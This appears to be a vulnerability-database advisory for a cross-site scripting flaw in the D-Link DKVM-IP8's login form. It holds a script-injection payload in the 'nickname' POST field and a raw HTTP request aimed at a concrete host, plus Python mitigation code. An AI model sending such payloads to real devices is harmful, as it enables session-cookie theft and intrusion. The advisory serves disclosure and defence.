Vendor: DKVM-IP8
By: POPCORN
CVSS: 7,5 (HIGH)
Type: Cross-Site Scripting (XSS)
CWE: 79
Product Name: DKVM-IP8
Affected Version From: 2282_dlinkA4_p8_20071213
Affected Version To: 2282_dlinkA4_p8_20071213
Patch Exists: N/A
Related CWE: N/A
CPE: //a:d_link:dkvm_ip8
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows Sp 2
2010

D-LINK DKVM-IP8 XSS Vulnerability

The POST variable nickname has been set to 1>">">"><script>alert(document.cookie)</script>

Mitigation:

Input validation, output encoding, and content security policies can be used to mitigate XSS attacks.
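The three mitigations above, applied to the reported `nickname` value. This is an added example, not code from the advisory or from the device firmware; the form template, the nickname allowlist and the CSP value are assumptions.

```python
import html
import re

# Payload exactly as the advisory reports it for the `nickname` POST variable.
REPORTED_PAYLOAD = '1>">">"><script>alert(document.cookie)</script>'

# Assumed policy: short nicknames made of letters, digits, "_", "-" and ".".
NICKNAME_RE = re.compile(r"[A-Za-z0-9_.-]{1,32}")

# Assumed page fragment: the form echoes the submitted nickname into an attribute.
TEMPLATE = '<input type="text" name="nickname" value="{value}">'

# Assumed header value: forbids inline script, so a missed encoding does not execute.
CSP_HEADER = ("Content-Security-Policy",
              "default-src 'self'; script-src 'self'; object-src 'none'")


def is_valid_nickname(value):
    """Input validation: accept only values that match the allowlist in full."""
    return NICKNAME_RE.fullmatch(value) is not None


def render_unsafe(value):
    """The vulnerable pattern: the raw value is concatenated into markup."""
    return TEMPLATE.format(value=value)


def render_encoded(value):
    """Output encoding: escape &, <, >, " and ' for an attribute context."""
    return TEMPLATE.format(value=html.escape(value, quote=True))


def handle_login_form(value):
    """Reject input that fails validation; encode whatever is echoed back."""
    if not is_valid_nickname(value):
        return 400, render_encoded("")
    return 200, render_encoded(value)


if __name__ == "__main__":
    print(render_unsafe(REPORTED_PAYLOAD))    # markup breaks out of the attribute
    print(render_encoded(REPORTED_PAYLOAD))   # value stays inside the attribute
    print(handle_login_form(REPORTED_PAYLOAD)[0], handle_login_form("admin")[0])
    print("%s: %s" % CSP_HEADER)
```

Validation and encoding are independent layers: encoding alone already keeps the reported value inert inside the attribute, and the allowlist rejects it before it is echoed at all.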

Exploit-DB raw data:

# Exploit Title: D-LINK DKVM-IP8 XSS Vulnerability
# Date: 01-06-2010
# Author: POPCORN
# Software Link: http://www.dlink.ru/
# Version: 2282_dlinkA4_p8_20071213
# Tested on: Windows Sp 2
# Site : http://Hacking.ge
# Code :
POST http://site.com:80/auth.asp HTTP/1.0
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
Host: 212.58.116.80
Content-Length: 90
Connection: Close
Pragma: no-cache
Attack details
The POST variable nickname has been set to 1>">">